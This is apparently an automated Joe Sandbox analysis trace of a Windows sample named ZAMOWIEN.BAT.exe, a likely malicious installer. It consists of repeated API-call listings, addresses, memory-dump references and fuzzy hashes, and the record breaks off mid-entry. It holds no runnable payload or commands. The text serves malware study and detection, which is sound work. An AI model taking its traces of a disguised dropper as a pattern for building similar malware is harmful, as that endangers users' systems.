                                                                            • Instruction ID: fc560a7afe38849c9814d2abec89c2cf6d06c3385e7adc2b23a750c1e33b7449
                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction Fuzzy Hash: E7E08C3261021ABBCF10AE50AC00AEB3BACEB053A0F01487AF912E3040D234E82187A4
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,0079097F,0078B730,00403584,0078B730,0079097F,0040CE68,00793730,00004000,?,00000000,004033AE), ref: 0040623E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction ID: 679f045a01091b3bffd6ce03f0c021b101ab6dc40d56b3d6f17c8d80975ea80a
                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction Fuzzy Hash: E4E08C3220021AEBCF20BF508C00EEB7BADEB413A0F05447AF91AE2090D234E92497A4
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(6E35505C,00000004,00000040,6E35504C), ref: 6E352A9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: e99d23e2c2d06683aa3e59cbbabf14636ecd1da51cf2c20b67ebc6c3469abeca
                                                                            • Instruction ID: 98e5ca272c444fe4e690847d145ad9a14032d1231b5e56fd8ab5ba8e3a16a4dc
                                                                            • Opcode Fuzzy Hash: e99d23e2c2d06683aa3e59cbbabf14636ecd1da51cf2c20b67ebc6c3469abeca
                                                                            • Instruction Fuzzy Hash: 1BF0AEF0905B80FECBA0CF68C844B0A3BE8B70A325B3445EAE188DB340E3347454CB91
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406583,?,?,?,?,Call,?,00000000), ref: 00406519
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                            • Instruction ID: 00d0e59c7e8c32caf741361cfbc3e2fda59707e438a7f9ca6dec15e91b5c489a
                                                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                            • Instruction Fuzzy Hash: D8D0173204020DBBDF119F90AD05FAB3B6DAB08310F014826FE06A90A2D776D670AB68
                                                                            APIs
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404665
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 6d7a4653c2c578a8d5284db4295a5fca007dcf3c6f2789ed20d5a7e0b642a0a4
                                                                            • Instruction ID: 1f0fa0d2247511df27580cb3caba4c56f286309e0a9037e8990667680d6ae8bf
                                                                            • Opcode Fuzzy Hash: 6d7a4653c2c578a8d5284db4295a5fca007dcf3c6f2789ed20d5a7e0b642a0a4
                                                                            • Instruction Fuzzy Hash: D0C04C71744600AAEA109B609E45F07776467D1B01F1489297240E50E0D679E450DA1C
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403301,?), ref: 00403611
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,?,00404467), ref: 0040464A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: e9c4bd98294b0e05cec7a80d31a0a76723ba02a2360da9c14e8ba5eddd12b981
                                                                            • Instruction ID: 80f62bd17d7f8ac79c475e35235d6e21c5e8bc2a0d4b48d8f994a5c5f8af4436
                                                                            • Opcode Fuzzy Hash: e9c4bd98294b0e05cec7a80d31a0a76723ba02a2360da9c14e8ba5eddd12b981
                                                                            • Instruction Fuzzy Hash: 4BB09235181A00BADA515B00DE09F46BB62ABA4701F008528B240680F0CAB200A0DB09
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,00404400), ref: 00404633
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 6f245bf96e23fac7bc6c618164a6406fbfa451b615f541c643cd93c68d609665
                                                                            • Instruction ID: 2bb5904b561859077d2e14bf17e8616c96b7e35b56e2a7e99b4d6fb7f9d4760d
                                                                            • Opcode Fuzzy Hash: 6f245bf96e23fac7bc6c618164a6406fbfa451b615f541c643cd93c68d609665
                                                                            • Instruction Fuzzy Hash: 3FA01132000800ABCA02AB20EF0880ABB22FBE0302B008828A282000308B320820EB08
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406469,?,?), ref: 00406309
                                                                            • GetShortPathNameW.KERNEL32(?,007A4E28,00000400), ref: 00406312
                                                                              • Part of subcall function 004060DD: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 004060ED
                                                                              • Part of subcall function 004060DD: lstrlenA.KERNEL32(?,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 0040611F
                                                                            • GetShortPathNameW.KERNEL32(?,007A5628,00000400), ref: 0040632F
                                                                            • wsprintfA.USER32 ref: 0040634D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,007A5628,C0000000,00000004,007A5628,?), ref: 00406388
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406397
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063CF
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A4A28,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406425
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406436
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040643D
                                                                              • Part of subcall function 00406178: GetFileAttributesW.KERNELBASE(?,00403118,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040617C
                                                                              • Part of subcall function 00406178: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040619E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$(Nz$(Vz$[Rename]
                                                                            • API String ID: 2171350718-1731141773
                                                                            • Opcode ID: 3357c57cd9792c63d911ae114c9432cadb4444b6c2488056b84af6109ea027cf
                                                                            • Instruction ID: a27f09b66fd920797b7c149302c9692e33d6e9fe9a0c6fb9e3bab823282c53bc
                                                                            • Opcode Fuzzy Hash: 3357c57cd9792c63d911ae114c9432cadb4444b6c2488056b84af6109ea027cf
                                                                            • Instruction Fuzzy Hash: B3315731500315BBD2206B259D49F2B3A6CEF86719F06003EFD02F62D3EA7D982586BD
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403626,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00406999
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C), ref: 004069A8
                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403626,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 004069AD
                                                                            • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403626,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 004069C0
                                                                            Strings
                                                                            • *?|<>/":, xrefs: 00406988
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406937
                                                                            • "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 0040697A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2772546769
                                                                            • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                            • Instruction ID: bb20283070e0c209d6802a1910856a96227ff7d3b8efcfb08896c30cca2a309c
                                                                            • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                            • Instruction Fuzzy Hash: 9411C4A580021399DB303B158D40ABBA6E8AF54750F52403FED8A73AC1E77C4CA282AD
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040468B
                                                                            • GetSysColor.USER32(00000000), ref: 004046C9
                                                                            • SetTextColor.GDI32(?,00000000), ref: 004046D5
                                                                            • SetBkMode.GDI32(?,?), ref: 004046E1
                                                                            • GetSysColor.USER32(?), ref: 004046F4
                                                                            • SetBkColor.GDI32(?,?), ref: 00404704
                                                                            • DeleteObject.GDI32(?), ref: 0040471E
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404728
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction ID: a443c49601a32498949eb5b8f53f9e12d43af113c8a35c603a6506417a82097f
                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction Fuzzy Hash: 1E2177B1500704ABC730DF78DA48B5B7BF4AF42711B04893DE996A36E0D738E944CB58
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E3525C2
                                                                              • Part of subcall function 6E3512CC: lstrcpynW.KERNEL32(00000000,?,6E35137F,00000019,6E3511CA,-000000A0), ref: 6E3512DC
                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 6E352548
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E352563
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID: @Hmu
                                                                            • API String ID: 4216380887-887474944
                                                                            • Opcode ID: 150f1185f7b09b868ea09a56beb73a78ffdcd1291e1467fdcf7a0dbb8cb8caea
                                                                            • Instruction ID: f22cedfc1958fd73a7ee338baa4461416d9e3e8f0846dfa4340ef705f4408981
                                                                            • Opcode Fuzzy Hash: 150f1185f7b09b868ea09a56beb73a78ffdcd1291e1467fdcf7a0dbb8cb8caea
                                                                            • Instruction Fuzzy Hash: 5C41AAB0008705EFDB149FA9D990E66B7BCFB45314F204D5DE48687380EB31A569CBB1
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                                            • GetTickCount.KERNEL32 ref: 0040306C
                                                                            • wsprintfW.USER32 ref: 0040309A
                                                                              • Part of subcall function 0040570D: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405745
                                                                              • Part of subcall function 0040570D: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405755
                                                                              • Part of subcall function 0040570D: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405768
                                                                              • Part of subcall function 0040570D: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll), ref: 0040577A
                                                                              • Part of subcall function 0040570D: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057A0
                                                                              • Part of subcall function 0040570D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 004057BA
                                                                              • Part of subcall function 0040570D: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C8
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                                              • Part of subcall function 00403017: MulDiv.KERNEL32(00080000,00000064,0001B2D9), ref: 0040302C
                                                                            Strings
                                                                            Memory Dump Source
